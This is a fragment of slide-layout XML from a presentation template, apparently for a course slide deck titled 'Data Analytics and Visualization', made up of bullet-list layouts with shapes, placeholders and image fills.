          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348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1" name="Google Shape;601;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830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33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773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33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830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. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1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34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p3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7" name="Google Shape;607;p3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08" name="Google Shape;608;p3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3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10" name="Google Shape;610;p3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1" name="Google Shape;611;p3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34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3" name="Google Shape;613;p34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34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34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34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7" name="Google Shape;617;p34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8" name="Google Shape;618;p34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9" name="Google Shape;619;p34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34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21" name="Google Shape;621;p34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34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34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34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  <p15:guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17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. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362456" y="1300238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8" name="Google Shape;628;p3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29" name="Google Shape;629;p3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30" name="Google Shape;630;p3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p3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2" name="Google Shape;632;p3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3" name="Google Shape;633;p3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4" name="Google Shape;634;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="13194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5" name="Google Shape;635;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="20025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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2692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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="33855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8" name="Google Shape;638;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="20049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39" name="Google Shape;639;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100" y="2695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0" name="Google Shape;640;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="33855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41" name="Google Shape;641;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1364850" y="407830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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="407830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43" name="Google Shape;643;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567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4" name="Google Shape;644;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="20103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5" name="Google Shape;645;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248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6" name="Google Shape;646;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="60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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4078298"/>
            <a:ext cx="785566" cy="6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. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1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36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p3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1" name="Google Shape;651;p3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52" name="Google Shape;652;p3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3" name="Google Shape;653;p3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54" name="Google Shape;654;p3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p3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6" name="Google Shape;656;p36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7" name="Google Shape;657;p36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36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36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36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36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2" name="Google Shape;662;p36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3" name="Google Shape;663;p36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4" name="Google Shape;664;p36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5" name="Google Shape;665;p36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66" name="Google Shape;666;p36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67" name="Google Shape;667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36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228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0" name="Google Shape;670;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228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36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36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228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. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2"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37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5" name="Google Shape;675;p3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76" name="Google Shape;676;p3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77" name="Google Shape;677;p3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8" name="Google Shape;678;p3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79" name="Google Shape;679;p3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0" name="Google Shape;680;p3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1" name="Google Shape;681;p37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2" name="Google Shape;682;p37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37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6" name="Google Shape;686;p37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7" name="Google Shape;687;p37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8" name="Google Shape;688;p37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89" name="Google Shape;689;p37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0" name="Google Shape;690;p37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1" name="Google Shape;691;p37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692" name="Google Shape;692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848847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4" name="Google Shape;694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4399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5" name="Google Shape;695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040985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6" name="Google Shape;696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622122"/>
            <a:ext cx="577804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37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203272"/>
            <a:ext cx="577804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. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3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38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p3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1" name="Google Shape;701;p3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02" name="Google Shape;702;p3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3" name="Google Shape;703;p3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04" name="Google Shape;704;p3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p3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6" name="Google Shape;706;p38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07" name="Google Shape;707;p38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8" name="Google Shape;708;p38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9" name="Google Shape;709;p38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38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1" name="Google Shape;711;p38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2" name="Google Shape;712;p38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3" name="Google Shape;713;p38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4" name="Google Shape;714;p38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5" name="Google Shape;715;p38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6" name="Google Shape;716;p38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17" name="Google Shape;717;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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9" name="Google Shape;719;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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0" name="Google Shape;720;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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1" name="Google Shape;721;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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2" name="Google Shape;722;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1"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p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141275" y="123782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5" name="Google Shape;725;p3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6" name="Google Shape;726;p3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27" name="Google Shape;727;p3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8" name="Google Shape;728;p3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29" name="Google Shape;729;p3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0" name="Google Shape;730;p3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1" name="Google Shape;731;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="12746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2" name="Google Shape;732;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="182890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p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="24199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4" name="Google Shape;734;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="30110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5" name="Google Shape;735;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141275" y="3602150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6" name="Google Shape;736;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="4193275"/>
            <a:ext cx="7728300" cy="486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p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="184885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8" name="Google Shape;738;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12200" y="24399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39" name="Google Shape;739;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12250" y="30310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0" name="Google Shape;740;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="3622100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41" name="Google Shape;741;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="4236125"/>
            <a:ext cx="9168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417300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42" name="Google Shape;742;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="126187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3" name="Google Shape;743;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847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39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="24399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39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985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p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="44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39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577805" cy="4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. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2"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40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0" name="Google Shape;750;p4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52" name="Google Shape;752;p40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3" name="Google Shape;753;p4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54" name="Google Shape;754;p40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5" name="Google Shape;755;p4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6" name="Google Shape;756;p40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7" name="Google Shape;757;p40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8" name="Google Shape;758;p40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59" name="Google Shape;759;p40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0" name="Google Shape;760;p40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1" name="Google Shape;761;p40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2" name="Google Shape;762;p40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3" name="Google Shape;763;p40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4" name="Google Shape;764;p40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5" name="Google Shape;765;p40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p40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67" name="Google Shape;767;p40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p40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69" name="Google Shape;769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0" name="Google Shape;770;p40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1" name="Google Shape;771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40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40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1390" l="0" r="0" t="1380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775" name="Google Shape;775;p40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. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1_1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5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9" name="Google Shape;39;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="3807100"/>
            <a:ext cx="8596200" cy="1062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" name="Google Shape;4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9747" y="3982500"/>
            <a:ext cx="822959" cy="7112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41" name="Google Shape;4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010" y="1193200"/>
            <a:ext cx="2286002" cy="1691641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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274800" y="3982500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1188700" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL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Data Analytics and Visualization</a:t>
            </a:r>
            <a:endParaRPr sz="18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3" name="Google Shape;43;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="4319775"/>
            <a:ext cx="8344500" cy="31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11887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4" name="Google Shape;44;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1828800"/>
            <a:ext cx="8595300" cy="12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200" lIns="2880350" spcFirstLastPara="1" rIns="457200" wrap="square" tIns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8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3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="3447025"/>
            <a:ext cx="8344500" cy="36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3200400" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="91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/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206300" y="4868750"/>
            <a:ext cx="8663400" cy="18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">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>© 2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
            <a:endParaRPr sz="600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. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1"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p41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4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79" name="Google Shape;779;p4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780" name="Google Shape;780;p41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1" name="Google Shape;781;p41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82" name="Google Shape;782;p41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3" name="Google Shape;783;p4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4" name="Google Shape;784;p41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5" name="Google Shape;785;p41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41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7" name="Google Shape;787;p41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8" name="Google Shape;788;p41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89" name="Google Shape;789;p41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41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1" name="Google Shape;791;p41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41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3" name="Google Shape;793;p41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4" name="Google Shape;794;p41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5" name="Google Shape;795;p41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6" name="Google Shape;796;p41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7" name="Google Shape;797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8" name="Google Shape;798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99" name="Google Shape;799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0" name="Google Shape;800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02" name="Google Shape;802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794760"/>
            <a:ext cx="520979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03" name="Google Shape;803;p41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43400"/>
            <a:ext cx="520979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. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1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42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6" name="Google Shape;806;p4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07" name="Google Shape;807;p42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08" name="Google Shape;808;p42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9" name="Google Shape;809;p42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10" name="Google Shape;810;p42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1" name="Google Shape;811;p4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2" name="Google Shape;812;p42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3" name="Google Shape;813;p42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4" name="Google Shape;814;p42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5" name="Google Shape;815;p42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42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7" name="Google Shape;817;p42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8" name="Google Shape;818;p42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19" name="Google Shape;819;p42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0" name="Google Shape;820;p42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1" name="Google Shape;821;p42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2" name="Google Shape;822;p42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23" name="Google Shape;823;p42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4" name="Google Shape;824;p42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25" name="Google Shape;825;p42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42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65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42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42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755163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42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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2892" l="0" r="0" t="2883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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2892" l="0" r="0" t="2883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. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045025" y="11616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4" name="Google Shape;834;p4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35" name="Google Shape;835;p43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36" name="Google Shape;836;p43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4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38" name="Google Shape;838;p43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9" name="Google Shape;839;p4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0" name="Google Shape;840;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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1" name="Google Shape;841;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045200" y="16842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2" name="Google Shape;842;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250" y="1697950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3" name="Google Shape;843;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045075" y="220740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4" name="Google Shape;844;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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5" name="Google Shape;845;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045075" y="27300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6" name="Google Shape;846;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-250" y="27437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7" name="Google Shape;847;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="3252650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8" name="Google Shape;848;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3266350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49" name="Google Shape;849;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="377527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0" name="Google Shape;850;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="3788975"/>
            <a:ext cx="9144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51" name="Google Shape;851;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045100" y="4323425"/>
            <a:ext cx="7849500" cy="4464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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4337125"/>
            <a:ext cx="91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3258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53" name="Google Shape;853;p43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1715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Google Shape;854;p43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650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5" name="Google Shape;855;p43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205600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6" name="Google Shape;856;p43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755163"/>
            <a:ext cx="521208" cy="396119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Google Shape;857;p43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3277788"/>
            <a:ext cx="521208" cy="396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p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1616" l="0" r="0" t="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393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9" name="Google Shape;859;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1616" l="0" r="0" t="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980" cy="3931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3. Bullets 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1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4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2" name="Google Shape;862;p44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63" name="Google Shape;863;p44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4" name="Google Shape;864;p44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65" name="Google Shape;865;p44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66" name="Google Shape;866;p4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7" name="Google Shape;867;p44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8" name="Google Shape;868;p44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69" name="Google Shape;869;p44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0" name="Google Shape;870;p44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1" name="Google Shape;871;p44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2" name="Google Shape;872;p44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3" name="Google Shape;873;p44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4" name="Google Shape;874;p44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5" name="Google Shape;875;p44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p44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7" name="Google Shape;877;p44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8" name="Google Shape;878;p44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79" name="Google Shape;879;p44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0" name="Google Shape;880;p44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81" name="Google Shape;881;p44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2" name="Google Shape;882;p44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883" name="Google Shape;883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4" name="Google Shape;884;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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5" name="Google Shape;885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p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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7" name="Google Shape;887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44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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9" name="Google Shape;889;p44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890" name="Google Shape;890;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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4. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1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4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3" name="Google Shape;893;p4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894" name="Google Shape;894;p45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5" name="Google Shape;895;p45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96" name="Google Shape;896;p45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4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898" name="Google Shape;898;p45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9" name="Google Shape;899;p45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0" name="Google Shape;900;p45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1" name="Google Shape;901;p45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2" name="Google Shape;902;p45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3" name="Google Shape;903;p45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4" name="Google Shape;904;p45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p45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6" name="Google Shape;906;p45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45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08" name="Google Shape;908;p45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9" name="Google Shape;909;p45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0" name="Google Shape;910;p45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1" name="Google Shape;911;p45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12" name="Google Shape;912;p45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3" name="Google Shape;913;p45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14" name="Google Shape;914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5" name="Google Shape;915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6" name="Google Shape;916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7" name="Google Shape;917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9" name="Google Shape;919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0" name="Google Shape;920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1" name="Google Shape;921;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830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5. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1"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4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4" name="Google Shape;924;p46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25" name="Google Shape;925;p46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6" name="Google Shape;926;p46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27" name="Google Shape;927;p46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8" name="Google Shape;928;p4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29" name="Google Shape;929;p46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0" name="Google Shape;930;p46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1" name="Google Shape;931;p46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2" name="Google Shape;932;p46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3" name="Google Shape;933;p46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4" name="Google Shape;934;p46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5" name="Google Shape;935;p46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6" name="Google Shape;936;p46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7" name="Google Shape;937;p46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8" name="Google Shape;938;p46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39" name="Google Shape;939;p46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0" name="Google Shape;940;p46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1" name="Google Shape;941;p46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46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43" name="Google Shape;943;p46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46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45" name="Google Shape;945;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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46"/>
